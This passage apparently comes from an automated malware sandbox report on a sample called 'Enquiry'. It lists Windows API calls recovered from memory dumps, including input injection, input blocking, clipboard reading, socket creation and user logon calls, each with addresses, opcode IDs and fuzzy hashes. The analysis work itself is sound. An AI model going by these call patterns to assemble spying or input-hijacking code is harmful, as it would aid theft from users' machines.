                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: KeyboardMessagePostState$InputSend
                            • String ID:
                            • API String ID: 3031425849-0
                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                            APIs
                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorLastinet_addrsocket
                            • String ID:
                            • API String ID: 4170576061-0
                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                            APIs
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • IsWindowVisible.USER32 ref: 0047A368
                            • IsWindowEnabled.USER32 ref: 0047A378
                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                            • IsIconic.USER32 ref: 0047A393
                            • IsZoomed.USER32 ref: 0047A3A1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                            • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                            APIs
                            • OpenClipboard.USER32(?), ref: 0046DCE7
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                            • CloseClipboard.USER32 ref: 0046DD0D
                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                            • CloseClipboard.USER32 ref: 0046DD41
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                            • CloseClipboard.USER32 ref: 0046DD99
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                            • String ID:
                            • API String ID: 15083398-0
                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: U$\
                            • API String ID: 4104443479-100911408
                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                            • FindClose.KERNEL32(00000000), ref: 004339EB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                            APIs
                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                            • String ID:
                            • API String ID: 901099227-0
                            • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                            • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                            APIs
                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Proc
                            • String ID:
                            • API String ID: 2346855178-0
                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                            APIs
                            • BlockInput.USER32(00000001), ref: 0045A38B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: BlockInput
                            • String ID:
                            • API String ID: 3456056419-0
                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                            APIs
                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                            APIs
                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                            • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID: N@
                            • API String ID: 0-1509896676
                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                            • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                            • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
